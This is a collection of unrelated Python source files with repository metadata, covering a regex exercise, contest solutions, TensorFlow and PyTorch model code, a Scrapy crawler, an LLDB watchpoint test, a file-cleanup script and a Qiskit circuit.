f7a398e1bd474d711dd6004b39549a4426d9920a | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter10/0011_rev09_match_z.py | b30aaea61405322ecf5e6f08f6aa090553e2a735 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | """
Review Question 9
Matches a word containing "z"
"""
import re
def main():
user_string = input("Enter sequence ")
pattern = re.compile(r"\b\w*z\w*\b")
match_object = pattern.search(user_string)
if match_object:
print("Match found")
print(match_object.group())
else:
print("No match found")
if __name__ == "__main__":
main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
37ad454a8a7d3c8cc63dd66a836de528d210b27f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03240/s819025179.py | 868e91e9b7562f6eedc217a4bfc2a8b1b491522a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import sys
import os
import math
import bisect
import itertools
import collections
import heapq
import queue
import array
# 時々使う
# from scipy.sparse.csgraph import csgraph_from_dense, floyd_warshall
# from decimal import Decimal
# from collections import defaultdict, deque
# 再帰の制限設定
sys.setrecursionlimit(10000000)
def ii(): return int(sys.stdin.buffer.readline().rstrip())
def il(): return list(map(int, sys.stdin.buffer.readline().split()))
def fl(): return list(map(float, sys.stdin.buffer.readline().split()))
def iln(n): return [int(sys.stdin.buffer.readline().rstrip())
for _ in range(n)]
def iss(): return sys.stdin.buffer.readline().decode().rstrip()
def sl(): return list(map(str, sys.stdin.buffer.readline().decode().split()))
def isn(n): return [sys.stdin.buffer.readline().decode().rstrip()
for _ in range(n)]
def lcm(x, y): return (x * y) // math.gcd(x, y)
# MOD = 10 ** 9 + 7
MOD = 998244353
INF = float('inf')
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = ii()
xyh = [il() for _ in range(N)]
for cx in range(0, 101):
for cy in range(0, 101):
tmp_x, tmp_y, tmp_h = -1, -1, -1
for x, y, h in xyh:
# 高さが1以上の調査点から
# ピラミッドの中心を求める
if h == 0:
continue
tmp_x, tmp_y = cx, cy
tmp_h = h + abs(x - cx) + abs(y - cy)
break
if tmp_h != -1:
# 求めた中心が全ての調査点の条件と
# 一致するか否かを確かめる
for x, y, h in xyh:
if h != max(tmp_h - abs(x - tmp_x) - abs(y - tmp_y), 0):
break
else:
print(tmp_x, tmp_y, tmp_h)
exit()
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
83bd218a3a6158cde57369b86689442952cd1249 | f8ad6963bfc851657ea50c6a036cfad29cdd7f60 | /Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Linear_Regression.py | 9c139d920a30a7310ed8b501626cfe7d1ea747e6 | [] | no_license | foru120/PythonRepository | e1ab0265c0f50ef2e9acdf7447237c913560692b | db6b6be0f9fb91b0a81a3b6a2ec5631daab10f98 | refs/heads/master | 2021-01-01T06:53:11.728109 | 2019-04-25T13:52:50 | 2019-04-25T13:52:50 | 97,541,222 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | import numpy as np
import tensorflow as tf
x_data = np.random.randn(2000, 3)
w_real = [0.3, 0.5, 0.1]
b_real = -0.2
noise = np.random.randn(1, 2000) * 0.1
y_data = np.matmul(w_real, x_data.T) + b_real + noise
NUM_STEPS = 10
g = tf.Graph()
wb_ = []
with g.as_default():
x = tf.placeholder(dtype=tf.float32, shape=[None, 3])
y_true = tf.placeholder(dtype=tf.float32, shape=None)
with tf.name_scope('inference') as scope:
w = tf.Variable([[0, 0, 0]], dtype=tf.float32, name='weights')
b = tf.Variable(0, dtype=tf.float32, name='bias')
y_pred = tf.matmul(w, tf.transpose(x)) + b
with tf.name_scope('loss') as scope:
loss = tf.reduce_mean(tf.square(y_true - y_pred))
with tf.name_scope('train') as scope:
learning_rate = 0.5
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train = optimizer.minimize(loss)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(NUM_STEPS):
sess.run(train, {x: x_data, y_true: y_data})
if step % 5 == 0:
print(step, sess.run([w, b]))
wb_.append(sess.run([w, b]))
print(10, sess.run([w, b])) | [
"broodsky1122@hanmail.net"
] | broodsky1122@hanmail.net |
53a3368b892b1ea07bd5aed868eef146253be066 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/others/CenterMask2/models/centermask2/centermask/modeling/centermask/maskiou_head.py | 23823fce2c12478ba7bdb4b83597a3363504cb80 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright (c) Sangrok Lee and Youngwan Lee (ETRI) All Rights Reserved.
import torch
from torch import nn
from torch.nn import functional as F
from detectron2.layers import Conv2d, ShapeSpec, cat
from detectron2.utils.registry import Registry
from centermask.layers import MaxPool2d, Linear
ROI_MASKIOU_HEAD_REGISTRY = Registry("ROI_MASKIOU_HEAD")
ROI_MASKIOU_HEAD_REGISTRY.__doc__ = """
Registry for maskiou heads, which predicts predicted mask iou.
The registered object will be called with `obj(cfg, input_shape)`.
"""
def mask_iou_loss(labels, pred_maskiou, gt_maskiou, loss_weight, weight):
"""
Compute the maskiou loss.
Args:
labels (Tensor): Given mask labels (num of instance,)
pred_maskiou (Tensor): A tensor of shape (num of instance, C)
gt_maskiou (Tensor): Ground Truth IOU generated in mask head (num of instance,)
"""
def l2_loss(input, target):
"""
very similar to the smooth_l1_loss from pytorch, but with
the extra beta parameter
"""
pos_inds = target > 0.0
if pos_inds.sum() > 0:
cond = torch.abs(input - target)
loss = 0.5 * cond**2 / pos_inds.sum()
else:
loss = input * 0.0
return (loss*weight.float()*pos_inds.float()).sum()
if labels.numel() == 0:
return pred_maskiou.sum() * 0
index = torch.arange(pred_maskiou.shape[0]).to(device=pred_maskiou.device)
maskiou_loss = l2_loss(pred_maskiou[index, labels], gt_maskiou)
maskiou_loss = loss_weight * maskiou_loss
return maskiou_loss
def mask_iou_inference(pred_instances, pred_maskiou):
labels = cat([i.pred_classes for i in pred_instances])
num_masks = pred_maskiou.shape[0]
index = torch.arange(num_masks, device=labels.device).long()
num_boxes_per_image = [len(i) for i in pred_instances]
maskious = pred_maskiou[index, labels].split(num_boxes_per_image, dim=0)
for maskiou, box in zip(maskious, pred_instances):
box.mask_scores = box.scores * maskiou
@ROI_MASKIOU_HEAD_REGISTRY.register()
class MaskIoUHead(nn.Module):
def __init__(self, cfg, input_shape: ShapeSpec):
super(MaskIoUHead, self).__init__()
# fmt: off
num_classes = cfg.MODEL.ROI_HEADS.NUM_CLASSES
conv_dims = cfg.MODEL.ROI_MASKIOU_HEAD.CONV_DIM
num_conv = cfg.MODEL.ROI_MASKIOU_HEAD.NUM_CONV
input_channels = input_shape.channels + 1
resolution = input_shape.width // 2
# fmt: on
self.conv_relus = []
stride = 1
for k in range(num_conv):
if (k+1) == num_conv:
stride = 2
conv = Conv2d(
input_channels if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=stride,
padding=1,
activation=F.relu
)
self.add_module("maskiou_fcn{}".format(k+1), conv)
self.conv_relus.append(conv)
self.maskiou_fc1 = Linear(conv_dims*resolution**2, 1024)
self.maskiou_fc2 = Linear(1024, 1024)
self.maskiou = Linear(1024, num_classes)
self.pooling = MaxPool2d(kernel_size=2, stride=2)
for l in self.conv_relus:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
for l in [self.maskiou_fc1, self.maskiou_fc2]:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
nn.init.normal_(self.maskiou.weight, mean=0, std=0.01)
nn.init.constant_(self.maskiou.bias, 0)
def forward(self, x, mask):
mask_pool = self.pooling(mask)
x = torch.cat((x, mask_pool), 1)
for layer in self.conv_relus:
x = layer(x)
x = torch.flatten(x, 1)
x = F.relu(self.maskiou_fc1(x))
x = F.relu(self.maskiou_fc2(x))
x = self.maskiou(x)
return x
def build_maskiou_head(cfg, input_shape):
"""
Build a mask iou head defined by `cfg.MODEL.ROI_MASKIOU_HEAD.NAME`.
"""
name = cfg.MODEL.ROI_MASKIOU_HEAD.NAME
return ROI_MASKIOU_HEAD_REGISTRY.get(name)(cfg, input_shape)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
539f747aea7fe6c503a164283f17c23d2cc410ef | 7e9c3b7684a7c9d712382cb170ab2ca1485b5ea2 | /test/test_monty.py | ed1e6c94242cb103125420c1f68e9ec9b17fbb0c | [
"Apache-2.0"
] | permissive | hackerlist/monty-python | 0adabb857d6025b8004f406a10f59a533c3df464 | eb4233e2f0301665e3469401e71d8a54c4503311 | refs/heads/master | 2020-12-30T09:38:07.050584 | 2014-05-24T10:45:23 | 2014-05-24T10:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #-*- coding: utf-8 -*-
"""
montypy.test
~~~~~~~~~~~~
Test cases for monty-python
"""
import unittest
import os
from montypy import Monty
TEST_SRV = 'https://monty.criticalpha.se'
class TestMontyPy(unittest.TestCase):
def test_instantiation(self):
m = Monty(TEST_SRV)
def test_nodes(self):
m = Monty(TEST_SRV)
nodes = m.nodes()
def test_probes(self):
m = Monty(TEST_SRV)
probes = m.probes()
def test_scripts(self):
m = Monty(TEST_SRV)
scripts = m.scripts()
def test_results(self):
m = Monty(TEST_SRV)
results = m.results()
def test_status(self):
m = Monty(TEST_SRV)
statuses = m.status()
| [
"michael.karpeles@gmail.com"
] | michael.karpeles@gmail.com |
74c58f92a24f50e470b93242b98a5a0b06c6581c | 69f2b8f54d923a064bf0de20249b5aa619f1da12 | /example/example/common/urls.py | 6c7ab2725da62af487d78fe557a29dc7035f43b8 | [] | no_license | skibblenybbles/django-dojoforms | 8302dff51f571d35e2c1f8439487baf494cd655c | 75e7b7a1c05c7db64df56352bd9e697450da4dab | refs/heads/master | 2020-12-29T01:41:46.657653 | 2012-11-08T03:55:50 | 2012-11-08T03:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.conf.urls import patterns, include, url
urlpatterns = patterns("example.common.views",
url(r'^$', "pages.homepage_view", name="homepage"),
)
| [
"mkibbel@gmail.com"
] | mkibbel@gmail.com |
24f50ff549e8c93fb62458eeb8bef3690e2293e6 | 63707652ba98b136744efd61115b7da9decd64ea | /homework1/q3/q3/spiders/q3_spider.py | d299ef2b3f7cf3267c544659ea1f1b26beb153c8 | [] | no_license | yerihyo/cs6200f13 | ad79a576f8ad190ef9f35049df988e62310ed0db | 96c5161a1b767118ded5dee441140fe49c499251 | refs/heads/master | 2021-01-01T18:07:55.390969 | 2013-09-18T22:57:27 | 2013-09-18T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from q3.items import HyperlinkItem
import re
import urlparse
import sys
from scrapy.exceptions import CloseSpider
# from scrapy.contrib.closespider import CloseSpider
class MyExtractor(SgmlLinkExtractor):
seen_urls = {}
def __init__(self, allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(),
tags=('a', 'area'), attrs=('href'), canonicalize=True, unique=True, process_value=None,
deny_extensions=None, seen_urls=[]):
SgmlLinkExtractor.__init__(self,allow=allow, deny=deny, allow_domains=allow_domains, deny_domains=deny_domains, restrict_xpaths=restrict_xpaths,
tags=tags, attrs=attrs, canonicalize=canonicalize, unique=unique, process_value=process_value,
deny_extensions=deny_extensions)
for l in seen_urls: self.seen_urls[l]=True
def is_valid_link(self,l):
url = l.url
p = urlparse.urlparse(url)
if p.scheme != 'http': return False
if p.netloc != 'www.ccs.neu.edu': return False
# if p.netloc != 'www.northeastern.edu': return False
if url in self.seen_urls: return False
self.seen_urls[url] = True
return True
def extract_links(self, response):
links = SgmlLinkExtractor.extract_links(self, response) # python's old-style super
filtered_links = filter(self.is_valid_link, links)
return filtered_links
class CCSSpider(CrawlSpider):
name = "ccs.neu.edu"
start_urls = [
"http://www.ccs.neu.edu/",
# "file:///tmp/tt",
]
extractor = MyExtractor(seen_urls=[], tags=('a','area','link'), unique=False, deny_extensions=[])
count = 0
rules = (
Rule(extractor, callback="parse_page", follow=True),
)
def parse(self,response):
self.extractor.seen_urls[response.url]=True
for i in self.parse_page(response):
yield i
for r in CrawlSpider.parse(self,response):
yield r
def parse_page(self,response):
content_types = re.split('\s*;\s*',response.headers['Content-Type'])
url = response.url
if 'application/pdf' in content_types or 'text/html' in content_types:
yield HyperlinkItem(url=url)
self.count += 1
if self.count>100:
raise CloseSpider("Closing spider")
| [
"yerihyo@gmail.com"
] | yerihyo@gmail.com |
537b65a9a936c8cc8663d161026ab155e899d103 | e3dcfa127f8d1e03b25d9f38d1d93bea9926d3b5 | /weaver/devtools/devclean.py | 183a4076e3b3ab0df35d7611d31c1229f4ca3c85 | [
"MIT"
] | permissive | mikadosoftware/weaver | 72832ff66efb8e352523126865ba1a89ad881ab2 | 58d35b72714a9be78d4bf31d9072b243469f5ffc | refs/heads/master | 2022-12-11T11:01:19.545070 | 2018-09-21T18:36:11 | 2018-09-21T18:36:11 | 76,447,730 | 0 | 0 | MIT | 2022-12-08T00:39:26 | 2016-12-14T10:04:52 | Python | UTF-8 | Python | false | false | 1,535 | py | #!/bin/env python
"""devclean
Usage:
devclean <rootpath> [--show]
devclean (-h | --help)
devclean --version
Options:
-h --help Show this screen.
--version Show version.
--show Only show dont kill files
"""
import os, sys
from fnmatch import fnmatch
from docopt import docopt
crap_matcher = ['*.*~',
'*.pyc',
'#*#']
ignore_dirs = ['.git', '__pycache__']
def killfiles(kill_list,
flag=False):
'''
'''
for fn in kill_list:
if flag:
os.remove(fn)
print("[x] ", fn)
else:
print("[ ] ", fn)
def clean_tree(cwd=None,
killflag=False):
'''walk eveything below me, delete all the crap
'''
rdir = cwd or os.getcwd()
kill_list = []
for root, dirs, files in os.walk(rdir):
#do we have dirs to ignore in next depth??
for _dir in dirs:
if _dir in ignore_dirs:
dirs.remove(_dir)
# now for each file, remove the crap, use globbing
for file in files:
for pattern in crap_matcher:
if fnmatch(file, pattern):
kill_list.append(os.path.join(root, file))
killfiles(kill_list, killflag)
#entrypoint
def main():
""" """
args = docopt(__doc__)
killflag = bool(not args['--show'])
rootpath = args['<rootpath>']
clean_tree(cwd=rootpath,
killflag=killflag)
if __name__ == '__main__':
import doctest
doctest.testmod()
| [
"paul@mikadosoftware.com"
] | paul@mikadosoftware.com |
08b77271f6d9e743446b11420b21694f8c5cb7a8 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02767/s509630790.py | 134d80c81b5f5cf92ccd09bce8a4d9e1b91e7af6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | N = int(input())
X_list = list(map(int, input().split()))
X_mean = round(sum(X_list) / N)
physical_sum = sum([(i - X_mean)**2 for i in X_list])
print(physical_sum) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
65e4cf82411c8c8153f0661d7ec0d14d2b426b00 | b29acb2e230b3cf2f8be070850c34ed5d62dc80c | /Python/YPS/Rensyu/08/Sample1.py | e365d37f505389fb63bb58af6d100aea58fe1491 | [] | no_license | MasatakaShibataSS/lesson | be6e3557c52c6157b303be268822cad613a7e0f7 | 4f3f81ba0161b820410e2a481b63a999d0d4338c | refs/heads/master | 2020-06-17T13:42:08.383167 | 2019-11-11T07:23:14 | 2019-11-11T07:23:14 | 195,940,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | class Car():
def __init__(self, num, gas):
self.num = num
self.gas = gas
def getNumber(self):
return self.num
def getGas(self):
return self.gas
cr1 = Car(1234, 25.5)
n1 = cr1.getNumber()
g1 = cr1.getGas()
cr2 = Car(2345, 30.5)
n2 = cr2.getNumber()
g2 = cr2.getGas()
print("ナンバーは", n1, "ガソリン量は", g1, "です。")
print("ナンバーは", n2, "ガソリン量は", g2, "です。")
| [
"masataka.shibata.ss@gmail.com"
] | masataka.shibata.ss@gmail.com |
7078dcee082ede20fd630e1599955619f9c49a3f | 9c006bd8b1f628200a63a194000836505f50be9b | /tools/lldb/test/functionalities/watchpoint/watchpoint_commands/command/TestWatchpointCommandLLDB.py | d2ba2ae6056b494007615c201f3531a9de244e39 | [
"NCSA"
] | permissive | hoangt/NyuziToolchain | a66989a1b9c71a2df782f9c573b0da62d1e0e9cf | 400aae2a01d38a1e836d7be33211aa8525c87070 | refs/heads/master | 2020-12-24T23:29:11.747602 | 2015-08-30T00:06:09 | 2015-08-30T00:06:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,631 | py | """
Test 'watchpoint command'.
"""
import os, time
import unittest2
import lldb
from lldbtest import *
import lldbutil
class WatchpointLLDBCommandTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Our simple source filename.
self.source = 'main.cpp'
# Find the line number to break inside main().
self.line = line_number(self.source, '// Set break point at this line.')
# And the watchpoint variable declaration line number.
self.decl = line_number(self.source, '// Watchpoint variable declaration.')
# Build dictionary to have unique executable names for each test method.
self.exe_name = 'a%d.out' % self.test_number
self.d = {'CXX_SOURCES': self.source, 'EXE': self.exe_name}
@skipUnlessDarwin
@dsym_test
def test_watchpoint_command_with_dsym(self):
"""Test 'watchpoint command'."""
self.buildDsym(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command()
@dwarf_test
@expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
def test_watchpoint_command_with_dwarf(self):
"""Test 'watchpoint command'."""
self.buildDwarf(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command()
@skipUnlessDarwin
@dsym_test
def test_watchpoint_command_can_disable_a_watchpoint_with_dsym(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
self.buildDsym(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command_can_disable_a_watchpoint()
@dwarf_test
@expectedFailureAndroid(archs=['arm', 'aarch64']) # Watchpoints not supported
def test_watchpoint_command_can_disable_a_watchpoint_with_dwarf(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
self.buildDwarf(dictionary=self.d)
self.setTearDownCleanup(dictionary=self.d)
self.watchpoint_command_can_disable_a_watchpoint()
def watchpoint_command(self):
"""Do 'watchpoint command add'."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "expr -- cookie = 777"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['expr -- cookie = 777'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint snapshoting mechanism is working.
self.expect("watchpoint list -v",
substrs = ['old value:', ' = 0',
'new value:', ' = 1'])
# The watchpoint command "forced" our global variable 'cookie' to become 777.
self.expect("frame variable --show-globals cookie",
substrs = ['(int32_t)', 'cookie = 777'])
def watchpoint_command_can_disable_a_watchpoint(self):
"""Test that 'watchpoint command' action can disable a watchpoint after it is triggered."""
exe = os.path.join(os.getcwd(), self.exe_name)
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Add a breakpoint to set a watchpoint when stopped on the breakpoint.
lldbutil.run_break_set_by_file_and_line (self, None, self.line, num_expected_locations=1)
# Run the program.
self.runCmd("run", RUN_SUCCEEDED)
# We should be stopped again due to the breakpoint.
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs = ['stopped',
'stop reason = breakpoint'])
# Now let's set a write-type watchpoint for 'global'.
self.expect("watchpoint set variable -w write global", WATCHPOINT_CREATED,
substrs = ['Watchpoint created', 'size = 4', 'type = w',
'%s:%d' % (self.source, self.decl)])
self.runCmd('watchpoint command add 1 -o "watchpoint disable 1"')
# List the watchpoint command we just added.
self.expect("watchpoint command list 1",
substrs = ['watchpoint disable 1'])
# Use the '-v' option to do verbose listing of the watchpoint.
# The hit count should be 0 initially.
self.expect("watchpoint list -v",
substrs = ['hit_count = 0'])
self.runCmd("process continue")
# We should be stopped again due to the watchpoint (write type).
# The stop reason of the thread should be watchpoint.
self.expect("thread backtrace", STOPPED_DUE_TO_WATCHPOINT,
substrs = ['stop reason = watchpoint'])
# Check that the watchpoint has been disabled.
self.expect("watchpoint list -v",
substrs = ['disabled'])
self.runCmd("process continue")
# There should be no more watchpoint hit and the process status should
# be 'exited'.
self.expect("process status",
substrs = ['exited'])
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lambda: lldb.SBDebugger.Terminate())
unittest2.main()
| [
"jeffbush001@gmail.com"
] | jeffbush001@gmail.com |
7cf33ffd307ec8485e367021e0c782dd7af726bb | 27a580304382e3a79c7307f42a83b689566dbf30 | /reinforcement_learning/0x03-policy_gradients/policy_gradient.py | dff87a11d16bf082c2455db22eacbd163879aa68 | [] | no_license | salmenz/holbertonschool-machine_learning | a37712a125cd2e9e4bd6975c3bb2338f3533474f | a49eb348ff994f35b0efbbd5ac3ac8ae8ccb57d2 | refs/heads/master | 2023-07-11T06:00:36.162782 | 2021-08-11T17:45:35 | 2021-08-11T17:45:35 | 279,366,817 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python3
"""policy gradient"""
import numpy as np
def policy(matrix, weight):
"""compute to policy with a weight of a matrix"""
z = matrix.dot(weight)
exp = np.exp(z)
return exp / np.sum(exp)
def softmax_grad(softmax):
"""softmax"""
s = softmax.reshape(-1, 1)
return np.diagflat(s) - np.dot(s, s.T)
def policy_gradient(state, weight):
"""compute the Monte-Carlo policy gradient"""
action = np.argmax(policy(state, weight))
softmax = softmax_grad(policy(state, weight))[action, :]
log = softmax / policy(state, weight)[0, action]
gradient = state.T.dot(log[None, :])
return (action, gradient)
| [
"salmen.zooro@gmail.com"
] | salmen.zooro@gmail.com |
78c81bf41eaa5f3d6619327d769a73f98ac9db0b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit1616.py | 5f4d304cc7b1179048c26042ec6efbd6cdbd56f6 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # qubit number=5
# total number=60
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.h(input_qubit[0]) # number=49
prog.cz(input_qubit[1],input_qubit[0]) # number=50
prog.h(input_qubit[0]) # number=51
prog.cx(input_qubit[1],input_qubit[0]) # number=52
prog.z(input_qubit[1]) # number=53
prog.h(input_qubit[0]) # number=57
prog.cz(input_qubit[1],input_qubit[0]) # number=58
prog.h(input_qubit[0]) # number=59
prog.cx(input_qubit[1],input_qubit[0]) # number=47
prog.h(input_qubit[0]) # number=32
prog.cz(input_qubit[1],input_qubit[0]) # number=33
prog.h(input_qubit[0]) # number=34
prog.x(input_qubit[4]) # number=48
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.cx(input_qubit[3],input_qubit[0]) # number=41
prog.z(input_qubit[3]) # number=42
prog.cx(input_qubit[3],input_qubit[0]) # number=43
prog.cx(input_qubit[1],input_qubit[3]) # number=44
prog.x(input_qubit[0]) # number=9
prog.h(input_qubit[1]) # number=56
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.rx(-2.9845130209103035,input_qubit[4]) # number=55
prog.cx(input_qubit[0],input_qubit[3]) # number=35
prog.x(input_qubit[3]) # number=36
prog.cx(input_qubit[0],input_qubit[3]) # number=37
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.x(input_qubit[0]) # number=25
prog.cx(input_qubit[1],input_qubit[0]) # number=26
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit1616.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
